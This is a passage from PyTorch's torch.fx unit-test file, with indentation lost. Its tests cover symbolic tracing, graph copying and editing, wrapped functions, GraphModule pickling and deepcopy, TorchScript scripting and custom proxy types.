def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in traced.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
